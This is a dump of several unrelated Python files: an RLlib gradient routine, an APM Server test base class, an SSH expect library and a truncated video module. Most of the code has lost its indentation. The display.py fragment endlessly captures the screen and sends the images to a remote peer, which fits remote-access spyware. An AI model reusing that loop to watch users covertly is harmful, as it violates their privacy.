results[shard_idx] = (all_grads, grad_info)
except Exception as e:
import traceback
with lock:
results[shard_idx] = (
ValueError(
e.args[0]
+ "\n traceback"
+ traceback.format_exc()
+ "\n"
+ "In tower {} on device {}".format(shard_idx, device)
),
e,
)
# Single device (GPU) or fake-GPU case (serialize for better
# debugging).
if len(self.devices) == 1 or self.config["_fake_gpus"]:
for shard_idx, (model, sample_batch, device) in enumerate(
zip(self.model_gpu_towers, sample_batches, self.devices)
):
_worker(shard_idx, model, sample_batch, device)
# Raise errors right away for better debugging.
last_result = results[len(results) - 1]
if isinstance(last_result[0], ValueError):
raise last_result[0] from last_result[1]
# Multi device (GPU) case: Parallelize via threads.
else:
threads = [
threading.Thread(
target=_worker, args=(shard_idx, model, sample_batch, device)
)
for shard_idx, (model, sample_batch, device) in enumerate(
zip(self.model_gpu_towers, sample_batches, self.devices)
)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Gather all threads' outputs and return.
outputs = []
for shard_idx in range(len(sample_batches)):
output = results[shard_idx]
if isinstance(output[0], Exception):
raise output[0] from output[1]
outputs.append(results[shard_idx])
return outputs
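# The comments in `learn_on_loaded_batch()` and `_multi_gpu_parallel_grad_calc()`
# above describe averaging per-tower gradients on the main device. The helper
# below is a minimal, self-contained sketch of that idea (toy linear model and
# random data; it is illustrative only and not used by TorchPolicy itself).
def _example_mean_reduce_tower_grads():
    import copy
    import torch
    main_model = torch.nn.Linear(4, 2)
    towers = [main_model, copy.deepcopy(main_model)]
    # Each tower computes gradients on its own data shard.
    tower_grads = []
    for tower in towers:
        tower.zero_grad()
        tower(torch.randn(8, 4)).sum().backward()
        tower_grads.append([p.grad.clone() for p in tower.parameters()])
    # Mean-reduce over towers and write the averages back into the main
    # model, mirroring the torch.mean(torch.stack([...]), dim=0) step above.
    for i, p in enumerate(main_model.parameters()):
        p.grad = torch.mean(torch.stack([g[i] for g in tower_grads]), dim=0)
    return main_model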
@DeveloperAPI
class DirectStepOptimizer:
"""Typesafe method for indicating `apply_gradients` can directly step the
optimizers with in-place gradients.
"""
_instance = None
def __new__(cls):
if DirectStepOptimizer._instance is None:
DirectStepOptimizer._instance = super().__new__(cls)
return DirectStepOptimizer._instance
def __eq__(self, other):
return type(self) == type(other)
def __repr__(self):
return "DirectStepOptimizer"
_directStepOptimizerSingleton = DirectStepOptimizer()
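# Usage note (illustrative sketch, not executable on its own; `policy` stands
# for any TorchPolicy instance): the singleton above acts as a sentinel value.
# `TorchPolicy.apply_gradients()` compares its argument against it to decide
# between stepping the optimizers on gradients already stored in-place versus
# loading an explicit gradient list first, e.g.:
#
#   policy.apply_gradients(_directStepOptimizerSingleton)  # step in-place grads
#   policy.apply_gradients(gradients_list)                 # load, then apply explicit grads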
|
apmserver.py
|
from datetime import datetime, timedelta
import json
import os
import re
import sets
import shutil
import sys
import threading
import time
import unittest
from urlparse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
from nose.tools import nottest
import requests
sys.path.append(os.path.join(os.path.dirname(__file__), '..',
'..', '_beats', 'libbeat', 'tests', 'system'))
from beat.beat import INTEGRATION_TESTS, TestCase, TimeoutError
from helper import wait_until
from es_helper import cleanup, default_pipelines
from es_helper import index_smap, index_span, index_error, apm_prefix
integration_test = unittest.skipUnless(INTEGRATION_TESTS, "integration test")
diagnostic_interval = float(os.environ.get('DIAGNOSTIC_INTERVAL', 0))
class BaseTest(TestCase):
maxDiff = None
def setUp(self):
super(BaseTest, self).setUp()
# TODO: move to Mixin and use only in tests where self.es is available
self.setup_diagnostics()
def setup_diagnostics(self):
if diagnostic_interval <= 0:
return
self.addCleanup(self.cleanup_diagnostics)
self.diagnostics_path = os.path.join(self.working_dir, "diagnostics")
os.makedirs(self.diagnostics_path)
self.running = True
self.diagnostic_thread = threading.Thread(
            target=self.dump_diagnostics, kwargs=dict(interval=diagnostic_interval))
self.diagnostic_thread.daemon = True
self.diagnostic_thread.start()
def cleanup_diagnostics(self):
self.running = False
self.diagnostic_thread.join(timeout=30)
    def dump_diagnostics(self, interval=2):
while self.running:
# TODO: use threading.Timer instead to not block tearDown
time.sleep(interval)
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".hot_threads"), mode="w") as out:
try:
out.write(self.es.nodes.hot_threads(threads=99999))
except Exception as e:
out.write("failed to query hot threads: {}\n".format(e))
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".tasks"), mode="w") as out:
try:
json.dump(self.es.tasks.list(), out, indent=True, sort_keys=True)
except Exception as e:
out.write("failed to query tasks: {}\n".format(e))
@classmethod
def setUpClass(cls):
cls.beat_name = "apm-server"
cls.beat_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", ".."))
cls.build_path = cls._beat_path_join("build", "system-tests")
super(BaseTest, cls).setUpClass()
@classmethod
def _beat_path_join(cls, *paths):
return os.path.abspath(os.path.join(cls.beat_path, *paths))
@staticmethod
def get_elasticsearch_url(user="", password=""):
"""
        Returns the Elasticsearch URL (host, port and optional credentials)
        built from the environment variables used by the integration tests.
"""
host = os.getenv("ES_HOST", "localhost")
if not user:
user = os.getenv("ES_USER", "admin")
if not password:
password = os.getenv("ES_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("ES_PORT", "9200"),
)
@staticmethod
def get_kibana_url(user="", password=""):
"""
Returns kibana host URL
"""
host = os.getenv("KIBANA_HOST", "localhost")
if not user:
user = os.getenv("KIBANA_USER", "admin")
if not password:
password = os.getenv("KIBANA_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("KIBANA_PORT", "5601"),
)
def get_payload_path(self, name):
return self.get_testdata_path('intake-v2', name)
@nottest
def get_testdata_path(self, *names):
return self._beat_path_join('testdata', *names)
def get_payload(self, name):
with open(self.get_payload_path(name)) as f:
return f.read()
def get_error_payload_path(self):
return self.get_payload_path("errors_2.ndjson")
def get_transaction_payload_path(self):
return self.get_payload_path("transactions.ndjson")
def get_metricset_payload_payload_path(self):
return self.get_payload_path("metricsets.ndjson")
def get_event_payload(self, name="events.ndjson"):
return self.get_payload(name)
def ilm_index(self, index):
return "{}-000001".format(index)
class ServerBaseTest(BaseTest):
config_overrides = {}
host = "http://localhost:8200"
root_url = "{}/".format(host)
agent_config_url = "{}/{}".format(host, "config/v1/agents")
rum_agent_config_url = "{}/{}".format(host, "config/v1/rum/agents")
intake_url = "{}/{}".format(host, 'intake/v2/events')
rum_intake_url = "{}/{}".format(host, 'intake/v2/rum/events')
sourcemap_url = "{}/{}".format(host, 'assets/v1/sourcemaps')
expvar_url = "{}/{}".format(host, 'debug/vars')
jaeger_grpc_host = "localhost:14250"
jaeger_http_host = "localhost:14268"
jaeger_http_url = "http://{}/{}".format(jaeger_http_host, 'api/traces')
def config(self):
cfg = {"ssl_enabled": "false",
"queue_flush": 0,
"jaeger_grpc_enabled": "true",
"jaeger_grpc_host": self.jaeger_grpc_host,
"jaeger_http_enabled": "true",
"jaeger_http_host": self.jaeger_http_host,
"path": os.path.abspath(self.working_dir) + "/log/*"}
cfg.update(self.config_overrides)
return cfg
def setUp(self):
super(ServerBaseTest, self).setUp()
shutil.copy(self._beat_path_join("fields.yml"), self.working_dir)
# Copy ingest pipeline definition to home directory of the test.
# The pipeline definition is expected to be at a specific location
# relative to the home dir. This ensures that the file can be loaded
# for all installations (deb, tar, ..).
pipeline_dir = os.path.join("ingest", "pipeline")
pipeline_def = os.path.join(pipeline_dir, "definition.json")
target_dir = os.path.join(self.working_dir, pipeline_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
shutil.copy(self._beat_path_join(pipeline_def), target_dir)
self.render_config_template(**self.config())
self.start_proc()
self.wait_until_started()
def start_proc(self):
self.apmserver_proc = self.start_beat(**self.start_args())
self.addCleanup(self.stop_proc)
def stop_proc(self):
self.apmserver_proc.check_kill_and_wait()
def start_args(self):
return {}
def wait_until_started(self):
wait_until(lambda: self.log_contains("Starting apm-server"), name="apm-server started")
def assert_no_logged_warnings(self, suppress=None):
"""
Assert that the log file contains no ERR or WARN lines.
"""
        if suppress is None:
suppress = []
        # Jenkins runs as a Windows service and when Jenkins executes these
# tests the Beat is confused since it thinks it is running as a service.
winErr = "ERR Error: The service process could not connect to the service controller."
corsWarn = "WARN\t.*CORS related setting .* Consider more restrictive setting for production use."
suppress = suppress + ["WARN EXPERIMENTAL", "WARN BETA", "WARN.*deprecated", winErr, corsWarn]
log = self.get_log()
for s in suppress:
log = re.sub(s, "", log)
self.assertNotRegexpMatches(log, "ERR|WARN")
def request_intake(self, data=None, url=None, headers=None):
if not url:
url = self.intake_url
if data is None:
data = self.get_event_payload()
if headers is None:
headers = {'content-type': 'application/x-ndjson'}
return requests.post(url, data=data, headers=headers)
class ElasticTest(ServerBaseTest):
skip_clean_pipelines = False
def config(self):
cfg = super(ElasticTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
"kibana_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def setUp(self):
self.es = Elasticsearch([self.get_elasticsearch_url()])
self.kibana_url = self.get_kibana_url()
delete_pipelines = [] if self.skip_clean_pipelines else default_pipelines
cleanup(self.es, delete_pipelines=delete_pipelines)
super(ElasticTest, self).setUp()
        # try to make sure APM Server is fully up
self.wait_until_ilm_logged()
self.wait_until_pipeline_logged()
def wait_until_ilm_logged(self):
setup_enabled = self.config().get("ilm_setup_enabled")
msg = "Finished index management setup." if setup_enabled != "false" else "Manage ILM setup is disabled."
wait_until(lambda: self.log_contains(msg), name="ILM setup")
def wait_until_pipeline_logged(self):
registration_enabled = self.config().get("register_pipeline_enabled")
msg = "Registered Ingest Pipelines successfully" if registration_enabled != "false" else "No pipeline callback registered"
wait_until(lambda: self.log_contains(msg), name="pipelines registration")
def load_docs_with_template(self, data_path, url, endpoint, expected_events_count,
query_index=None, max_timeout=10, extra_headers=None):
if query_index is None:
query_index = apm_prefix
headers = {'content-type': 'application/x-ndjson'}
if extra_headers:
headers.update(extra_headers)
with open(data_path) as f:
r = requests.post(url, data=f, headers=headers)
assert r.status_code == 202, r.status_code
# Wait to give documents some time to be sent to the index
self.wait_for_events(endpoint, expected_events_count, index=query_index, max_timeout=max_timeout)
def wait_for_events(self, processor_name, expected_count, index=None, max_timeout=10):
"""
wait_for_events waits for an expected number of event docs with the given
'processor.name' value, and returns the hits when found.
"""
if index is None:
index = apm_prefix
query = {"term": {"processor.name": processor_name}}
result = {} # TODO(axw) use "nonlocal" when we migrate to Python 3
def get_docs():
hits = self.es.search(index=index, body={"query": query})['hits']
result['docs'] = hits['hits']
return hits['total']['value'] == expected_count
wait_until(get_docs,
max_timeout=max_timeout,
name="{} documents to reach {}".format(processor_name, expected_count),
)
return result['docs']
def check_backend_error_sourcemap(self, index, count=1):
rs = self.es.search(index=index, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_for_no_smap(exception)
if "log" in err:
self.check_for_no_smap(err["log"])
def check_backend_span_sourcemap(self, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
self.check_for_no_smap(doc["_source"]["span"])
def check_for_no_smap(self, doc):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
assert "sourcemap" not in frame, frame
def logged_requests(self, url="/intake/v2/events"):
for line in self.get_log_lines():
jline = json.loads(line)
u = urlparse(jline.get("URL", ""))
if jline.get("logger") == "request" and u.path == url:
yield jline
def approve_docs(self, base_path, received):
"""
approve_docs compares the received documents to those contained
in the file at ${base_path}.approved.json. If that file does not
exist, then it is considered equivalent to a lack of documents.
Only the document _source is compared, and we ignore differences
in some context-sensitive fields such as the "observer", which
may vary between test runs.
"""
base_path = self._beat_path_join(os.path.dirname(__file__), base_path)
approved_path = base_path + '.approved.json'
received_path = base_path + '.received.json'
try:
with open(approved_path) as f:
approved = json.load(f)
except IOError:
approved = []
# get_doc_id returns a value suitable for sorting and identifying
# documents: either a unique ID, or a timestamp. This is necessary
# since not all event types require a unique ID (namely, errors do
# not.)
#
# We return (0, doc['error']['id']) when the event type is 'error'
# if that field exists, otherwise returns (1, doc['@timestamp']).
# The first tuple element exists to sort IDs before timestamps.
def get_doc_id(doc):
doc_type = doc['processor']['event']
if 'id' in doc[doc_type]:
return (0, doc[doc_type]['id'])
return (1, doc['@timestamp'])
received = [doc['_source'] for doc in received]
received.sort(key=get_doc_id)
try:
for rec in received:
# Overwrite received observer values with the approved ones,
# in order to avoid noise in the 'approvals' diff if there are
# any other changes.
#
# We don't compare the observer values between received/approved,
# as they are dependent on the environment.
rec_id = get_doc_id(rec)
rec_observer = rec['observer']
self.assertEqual(sets.Set(rec_observer.keys()), sets.Set(
["hostname", "version", "id", "ephemeral_id", "type", "version_major"]))
assert rec_observer["version"].startswith(str(rec_observer["version_major"]) + ".")
for appr in approved:
if get_doc_id(appr) == rec_id:
rec['observer'] = appr['observer']
# ensure both docs have the same event keys set
self.assertEqual(rec.get("event", {}).keys(), appr.get("event", {}).keys())
# We don't compare the event values between received/approved
# as they are dependent on the environment.
if 'event' in rec:
rec['event'] = appr['event']
break
assert len(received) == len(approved)
for i, rec in enumerate(received):
appr = approved[i]
rec_id = get_doc_id(rec)
assert rec_id == get_doc_id(appr), "New entry with id {}".format(rec_id)
for k, v in rec.items():
self.assertEqual(v, appr[k])
except Exception as exc:
with open(received_path, 'w') as f:
json.dump(received, f, indent=4, separators=(',', ': '))
# Create a dynamic Exception subclass so we can fake its name to look like the original exception.
class ApprovalException(Exception):
def __init__(self, cause):
super(ApprovalException, self).__init__(cause.message)
def __str__(self):
return self.message + "\n\nReceived data differs from approved data. Run 'make update' and then 'approvals' to verify the diff."
ApprovalException.__name__ = type(exc).__name__
raise ApprovalException, exc, sys.exc_info()[2]
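# A small, self-contained sketch (toy documents, not real APM events) of the
# tuple sort key described in approve_docs() above: documents with an id get
# a leading 0 and sort before timestamp-keyed documents, which get a leading 1.
def _example_doc_sort_key():
    docs = [
        {"processor": {"event": "error"}, "error": {}, "@timestamp": "2019-01-01T00:00:01Z"},
        {"processor": {"event": "transaction"}, "transaction": {"id": "ab12"},
         "@timestamp": "2019-01-01T00:00:00Z"},
    ]
    def get_doc_id(doc):
        doc_type = doc['processor']['event']
        if 'id' in doc[doc_type]:
            return (0, doc[doc_type]['id'])
        return (1, doc['@timestamp'])
    return sorted(docs, key=get_doc_id)  # transaction (id) sorts before error (timestamp)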
class ClientSideBaseTest(ServerBaseTest):
sourcemap_url = 'http://localhost:8200/assets/v1/sourcemaps'
intake_url = 'http://localhost:8200/intake/v2/rum/events'
backend_intake_url = 'http://localhost:8200/intake/v2/events'
config_overrides = {}
def config(self):
cfg = super(ClientSideBaseTest, self).config()
cfg.update({"enable_rum": "true",
"kibana_enabled": "false",
"smap_cache_expiration": "200"})
cfg.update(self.config_overrides)
return cfg
def get_backend_error_payload_path(self, name="errors_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_backend_transaction_payload_path(self, name="transactions_spans.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_error_payload_path(self, name="errors_rum.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_transaction_payload_path(self, name="transactions_spans_rum_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def upload_sourcemap(self, file_name='bundle_no_mapping.js.map',
service_name='apm-agent-js',
service_version='1.0.1',
bundle_filepath='bundle_no_mapping.js.map'):
path = self._beat_path_join('testdata', 'sourcemap', file_name)
with open(path) as f:
return requests.post(self.sourcemap_url,
files={'sourcemap': f},
data={'service_version': service_version,
'bundle_filepath': bundle_filepath,
'service_name': service_name})
class ClientSideElasticTest(ClientSideBaseTest, ElasticTest):
def wait_for_sourcemaps(self, expected_ct=1):
self.wait_for_events('sourcemap', expected_ct, index=index_smap)
def check_rum_error_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_error, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_smap(exception, updated, expected_err)
if "log" in err:
self.check_smap(err["log"], updated, expected_err)
def check_rum_transaction_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
span = doc["_source"]["span"]
self.check_smap(span, updated, expected_err)
@staticmethod
def check_smap(doc, updated, err=None):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
smap = frame["sourcemap"]
if err is None:
assert 'error' not in smap
else:
assert err in smap["error"]
assert smap["updated"] == updated
class CorsBaseTest(ClientSideBaseTest):
def config(self):
cfg = super(CorsBaseTest, self).config()
cfg.update({"allow_origins": ["http://www.elastic.co"]})
return cfg
class ExpvarBaseTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(ExpvarBaseTest, self).config()
cfg.update(self.config_overrides)
return cfg
def get_debug_vars(self):
return requests.get(self.expvar_url)
class SubCommandTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(SubCommandTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def wait_until_started(self):
self.apmserver_proc.check_wait()
# command and go test output is combined in log, pull out the command output
log = self.get_log()
pos = -1
for _ in range(2):
# export always uses \n, not os.linesep
pos = log[:pos].rfind("\n")
self.command_output = log[:pos]
for trimmed in log[pos:].strip().splitlines():
# ensure only skipping expected lines
assert trimmed.split(None, 1)[0] in ("PASS", "coverage:"), trimmed
def stop_proc(self):
return
class ProcStartupFailureTest(ServerBaseTest):
def stop_proc(self):
try:
self.apmserver_proc.kill_and_wait()
except:
self.apmserver_proc.wait()
def wait_until_started(self):
return
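# Minimal sketch of the mutable-dict closure pattern used by
# ElasticTest.wait_for_events() above: Python 2 has no `nonlocal`, so the
# inner predicate stores what it found in a dict owned by the enclosing scope.
def _example_closure_result():
    result = {}
    def predicate():
        result['docs'] = ['doc-1', 'doc-2']  # stand-in for search hits
        return True
    predicate()
    return result['docs']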
|
paramiko_expect.py
|
#
# Paramiko Expect
#
# Written by Fotis Gimian
# http://github.com/fgimian
#
# This library works with a Paramiko SSH channel to provide native SSH
# expect-like handling for servers. The library may be used to interact
# with commands like 'configure' or Cisco IOS devices or with interactive
# Unix scripts or commands.
#
# You must have Paramiko installed in order to use this library.
#
from __future__ import unicode_literals
import codecs
import sys
import re
import socket
import struct
import time
# Windows does not have termios
try:
import termios
import tty
has_termios = True
MAX_TIMEOUT = 2 ** (struct.Struct(str('i')).size * 8 - 1) - 1
except ImportError: # pragma: no cover
import threading
has_termios = False
MAX_TIMEOUT = threading.TIMEOUT_MAX
import select
def strip_ansi_codes(s):
return re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', s)
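# Quick illustrative check (made-up input) of what strip_ansi_codes() removes:
# colour and erase-line escape sequences disappear, the visible text remains.
def _example_strip_ansi():
    coloured = '\x1b[1;31mERROR\x1b[0m: disk full\x1b[K'
    return strip_ansi_codes(coloured)  # -> 'ERROR: disk full'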
def default_output_func(msg):
sys.stdout.write(msg)
sys.stdout.flush()
class SSHClientInteraction(object):
"""
This class allows an expect-like interface to Paramiko which allows
coders to interact with applications and the shell of the connected
device.
:param client: A Paramiko SSHClient object
:param timeout: The connection timeout in seconds
:param newline: The newline character to send after each command
:param buffer_size: The amount of data (in bytes) that will be read at
a time after a command is run
:param display: Whether or not the output should be displayed in
real-time as it is being performed (especially useful
when debugging)
:param encoding: The character encoding to use.
:param lines_to_check: The number of last few lines of the output to
look at, while matching regular expression(s)
"""
def __init__(
self, client, timeout=60, newline='\r', buffer_size=1024,
display=False, encoding='utf-8', output_callback=default_output_func,
tty_width=80, tty_height=24, lines_to_check=1
):
self.channel = client.invoke_shell(width=tty_width, height=tty_height)
self.timeout = timeout
self.newline = newline
self.buffer_size = buffer_size
self.display = display
self.encoding = encoding
self.output_callback = output_callback
self.lines_to_check = lines_to_check
self.current_output = ''
self.current_output_clean = ''
self.current_send_string = ''
self.last_match = ''
# If the output is long, multi-byte encoded characters may be split
# across calls to recv, so decode incrementally.
self.decoder = codecs.getincrementaldecoder(self.encoding)()
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
"""Attempts to close the channel for clean completion."""
try:
self.channel.close()
except Exception:
pass
def expect(
self, re_strings='', timeout=None, output_callback=None, default_match_prefix='.*\n',
strip_ansi=True, ignore_decode_error=True, lines_to_check=None, leave_expected=False
):
"""
This function takes in a regular expression (or regular expressions)
that represent the last line of output from the server. The function
waits for one or more of the terms to be matched. The regexes are
matched using expression \n<regex>$ so you'll need to provide an
easygoing regex such as '.*server.*' if you wish to have a fuzzy
match.
:param re_strings: Either a regex string or list of regex strings
that we should expect; if this is not specified,
then EOF is expected (i.e. the shell is completely
closed after the exit command is issued)
:param timeout: Timeout in seconds. If this timeout is exceeded,
then an exception is raised.
:param output_callback: A function used to print ssh output. Printed to stdout
by default. A user-defined logger may be passed like
output_callback=lambda m: mylog.debug(m)
        :param default_match_prefix: A prefix to all match regexes, defaults to '.*\n',
                                     can be set to '' for cases where the prompt is the
                                     first line, or the command has no output.
        :param strip_ansi: If True, strip ANSI control characters before regex matching.
                           Defaults to True.
        :param ignore_decode_error: If True, ignore any decode errors.
                                    Defaults to True.
:param lines_to_check: The number of last few lines of the output to
look at, while matching regular expression(s)
        :return: An EOF returns -1, a regex match returns 0 and a match in a
list of regexes returns the index of the matched string in
the list.
:raises: A socket.timeout exception is raised on timeout.
"""
output_callback = output_callback if output_callback else self.output_callback
# Set the channel timeout
timeout = timeout if timeout else self.timeout
self.channel.settimeout(timeout)
lines_to_check = lines_to_check if lines_to_check else self.lines_to_check
if ignore_decode_error:
self.decoder = codecs.getincrementaldecoder(self.encoding)('ignore')
# Create an empty output buffer
self.current_output = ''
# saves the current buffer to check for re_strings pattern
current_buffer_output_decoded = ''
# This function needs all regular expressions to be in the form of a
# list, so if the user provided a string, let's convert it to a 1
# item list.
if isinstance(re_strings, str) and len(re_strings) != 0:
re_strings = [re_strings]
# to avoid looping in recv_ready()
base_time = time.time()
# Loop until one of the expressions is matched or loop forever if
# nothing is expected (usually used for exit)
while (
len(re_strings) == 0 or
not [re_string
for re_string in re_strings
if re.match(default_match_prefix + re_string + '$',
current_buffer_output_decoded, re.DOTALL)]
):
current_buffer_output_decoded = ''
# avoids paramiko hang when recv is not ready yet
while not self.channel.recv_ready():
time.sleep(.009)
if time.time() >= (base_time + timeout):
print('EXCESS TIME RECV_READY TIMEOUT, did you expect() before a send()')
return -1
# Read some of the output
current_buffer = self.channel.recv(self.buffer_size)
# If we have an empty buffer, then the SSH session has been closed
if len(current_buffer) == 0:
break
# Convert the buffer to our chosen encoding
current_buffer_decoded = self.decoder.decode(current_buffer)
# Strip all ugly \r (Ctrl-M making) characters from the current
# read
current_buffer_decoded = current_buffer_decoded.replace('\r', '')
# Display the current buffer in realtime if requested to do so
# (good for debugging purposes)
if strip_ansi:
current_buffer_decoded = strip_ansi_codes(current_buffer_decoded)
if not current_buffer_decoded:
continue
if self.display:
output_callback(current_buffer_decoded)
# Add the currently read buffer to the output
self.current_output += current_buffer_decoded
current_buffer_output_decoded = '\n' + '\n'.join(self.current_output.splitlines()[-lines_to_check:])
# Grab the first pattern that was matched
if len(re_strings) != 0:
found_pattern = [(re_index, re_string)
for re_index, re_string in enumerate(re_strings)
if re.match(default_match_prefix + re_string + '$',
self.current_output, re.DOTALL)]
# Clean the output up by removing the sent command
self.current_output_clean = self.current_output
if len(self.current_send_string) != 0:
self.current_output_clean = (
self.current_output_clean.replace(
self.current_send_string + self.newline, ''
)
)
# Reset the current send string to ensure that multiple expect calls
# don't result in bad output cleaning
self.current_send_string = ''
# Clean the output up by removing the expect output from the end if
# requested and save the details of the matched pattern
if len(re_strings) != 0 and len(found_pattern) != 0:
if not leave_expected:
self.current_output_clean = (
re.sub(
found_pattern[0][1] + '$', '', self.current_output_clean
)
)
self.last_match = found_pattern[0][1]
return found_pattern[0][0]
else:
# We would socket timeout before getting here, but for good
# measure, let's send back a -1
return -1
def send(self, send_string, newline=None):
"""Saves and sends the send string provided."""
self.current_send_string = send_string
# send_string, _ = codecs.getdecoder(self.encoding)(send_string)
newline = newline if newline is not None else self.newline
# don't send till send_ready
while not self.channel.send_ready():
time.sleep(.009)
self.channel.send(send_string)
self.channel.send(newline)
def tail(
self, line_prefix=None, callback=None, output_callback=None, stop_callback=lambda x: False,
timeout=None
):
"""
This function takes control of an SSH channel and displays line
        by line of output as \n is received. This function is specifically
made for tail-like commands.
:param line_prefix: Text to append to the left of each line of output.
This is especially useful if you are using my
MultiSSH class to run tail commands over multiple
servers.
:param callback: You may optionally supply a callback function which
                         takes two parameters. The first is the line prefix
and the second is current line of output. The
callback should return the string that is to be
displayed (including the \n character). This allows
users to grep the output or manipulate it as
required.
:param output_callback: A function used to print ssh output. Printed to stdout
by default. A user-defined logger may be passed like
output_callback=lambda m: mylog.debug(m)
        :param stop_callback: A function used to stop the tail; when the function
                              returns True the tail stops. Defaults to
                              stop_callback=lambda x: False
        :param timeout: How much time to wait for data. Defaults to None, which
                        means almost forever.
"""
output_callback = output_callback if output_callback else self.output_callback
# Set the channel timeout to the maximum allowed value,
# setting this to None breaks the KeyboardInterrupt exception and
# won't allow us to Ctrl+C out of the script
timeout = timeout if timeout else MAX_TIMEOUT
self.channel.settimeout(timeout)
# Create an empty line buffer and a line counter
current_line = b''
line_counter = 0
line_feed_byte = '\n'.encode(self.encoding)
# Loop forever, Ctrl+C (KeyboardInterrupt) is used to break the tail
while True:
# Read the output one byte at a time so we can detect \n correctly
buffer = self.channel.recv(1)
# If we have an empty buffer, then the SSH session has been closed
if len(buffer) == 0:
break
# Add the currently read buffer to the current line output
current_line += buffer
# Display the last read line in realtime when we reach a \n
# character
if buffer == line_feed_byte:
current_line_decoded = self.decoder.decode(current_line)
if line_counter:
if callback:
output_callback(callback(line_prefix, current_line_decoded))
else:
if line_prefix:
output_callback(line_prefix)
output_callback(current_line_decoded)
if stop_callback(current_line_decoded):
break
line_counter += 1
current_line = b''
def take_control(self):
"""
This function is a better documented and touched up version of the
posix_shell function found in the interactive.py demo script that
ships with Paramiko.
"""
if has_termios:
# Get attributes of the shell you were in before going to the
# new one
original_tty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
# We must set the timeout to 0 so that we can bypass times when
# there is no available text to receive
self.channel.settimeout(0)
# Loop forever until the user exits (i.e. read buffer is empty)
while True:
select_read, select_write, select_exception = (
select.select([self.channel, sys.stdin], [], [])
)
# Read any output from the terminal and print it to the
                    # screen. With timeout set to 0, we can just ignore times
# when there's nothing to receive.
if self.channel in select_read:
try:
buffer = self.channel.recv(self.buffer_size)
if len(buffer) == 0:
break
sys.stdout.write(self.decoder.decode(buffer))
sys.stdout.flush()
except socket.timeout:
pass
# Send any keyboard input to the terminal one byte at a
# time
if sys.stdin in select_read:
buffer = sys.stdin.read(1)
if len(buffer) == 0:
break
self.channel.send(buffer)
finally:
# Restore the attributes of the shell you were in
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, original_tty)
else:
def writeall(sock):
while True:
buffer = sock.recv(self.buffer_size)
if len(buffer) == 0:
break
sys.stdout.write(self.decoder.decode(buffer))
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(self.channel,))
writer.start()
try:
while True:
buffer = sys.stdin.read(1)
if len(buffer) == 0:
break
self.channel.send(buffer)
# User has hit Ctrl+Z or F6
except EOFError:
pass
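# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# A minimal, hedged example of driving the interaction class defined above.
# The class name used here (SSHClientInteraction) and its constructor
# arguments are assumptions made only for illustration; the expect()/send()
# calls and the current_output_clean attribute are the real API shown above.
def _example_interactive_session():
    import paramiko
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect('host.example.com', username='user', password='secret')  # hypothetical host/credentials
    interact = SSHClientInteraction(client, timeout=10)  # assumed class name/signature
    interact.expect(r'.*\$\s+')           # wait for a shell prompt
    interact.send('uname -a')             # run a command
    interact.expect(r'.*\$\s+')           # wait for the prompt to return
    print(interact.current_output_clean)  # output with the sent command and prompt stripped
    client.close()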
|
display.py
|
import threading
try:
from .grab import Image
except ImportError:
    pass  # screen grabbing is unavailable if the grab module cannot be imported
def grab_bytes():
return Image().asbytes
def send(s,a):
s.post(b's'+grab_bytes(),a)
def show_bytes(r):
if not r.startswith('s'):return
Image(r[1:]).show()
def conf(s,a):
def _conf():
while True:
send(s,a)
threading.Thread(target=_conf).start()
|
video_base.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
'''
An Event-like class that signals all active clients when a new frame is available.
'''
class VideoEvent(object):
# Initialize events variable
def __init__(self):
self.events = {}
def wait(self):
'''Invoked from each client's thread to wait for the next frame.'''
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
